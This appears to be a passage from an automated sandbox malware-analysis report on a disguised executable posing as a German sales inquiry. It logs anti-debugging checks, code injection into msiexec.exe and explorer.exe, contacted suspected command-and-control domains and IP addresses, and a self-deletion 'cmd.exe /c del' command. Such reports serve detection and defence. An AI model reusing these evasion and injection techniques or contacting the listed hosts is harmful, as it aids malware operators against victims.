          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D2B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D2B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D0B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D0B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D0C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D09100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D09100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D09100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D3513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D3513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D24120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D24120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D24120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D24120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D24120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D32ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D32AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D3D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D3D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D1AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D1AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D3FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04DCEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D94257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D09240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D09240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D09240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D09240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D4927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04DBB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04DBB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04DD8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D05210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D05210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D05210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D05210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D0AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D0AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04DCAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04DCAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D23A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D18A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D44A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D44A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D853CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D853CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D2DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D3B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D32397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04DC138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04DBD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D11B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D11B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04DD5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D34BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D34BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D34BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04DD8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D0F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D0DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D33B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D33B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D0DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04DC131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeCode function: 2_2_00409B50 LdrLoadDll,
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\explorer.exeDomain query: www.terrierslovjt.xyz
          Source: C:\Windows\explorer.exeDomain query: www.williamhag.online
          Source: C:\Windows\explorer.exeDomain query: www.tra4fficsearchtabspace.rest
          Source: C:\Windows\explorer.exeNetwork Connect: 185.76.64.173 80
          Source: C:\Windows\explorer.exeDomain query: www.schonheitschirurg.online
          Source: C:\Windows\explorer.exeNetwork Connect: 104.19.178.121 80
          Source: C:\Windows\explorer.exeDomain query: www.hautebazaar.net
          Source: C:\Windows\explorer.exeDomain query: www.youcanstores.com
          Source: C:\Windows\explorer.exeDomain query: www.tunnelvisionconference.com
          Source: C:\Windows\explorer.exeNetwork Connect: 216.250.121.17 80
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.212 80
          Source: C:\Windows\explorer.exeNetwork Connect: 185.111.89.175 80
          Source: C:\Windows\explorer.exeDomain query: www.10thring.com
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 11F0000
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeSection loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeSection loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeThread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeThread register set: target process: 3968
          Source: C:\Windows\SysWOW64\msiexec.exeThread register set: target process: 3968
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeProcess created: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe"
          Source: explorer.exe, 00000003.00000000.298472721.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.315136764.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.364158070.0000000000688000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanEXE^
          Source: explorer.exe, 00000003.00000000.280036483.0000000005920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.364572938.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.298737990.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000000.364572938.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.298737990.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.315576874.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000000.364572938.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.298737990.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.315576874.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000003.00000000.298497449.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.275861271.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.364172995.000000000069D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd4
          Source: explorer.exe, 00000003.00000000.364572938.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.298737990.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.315576874.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: WProgram Manager
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
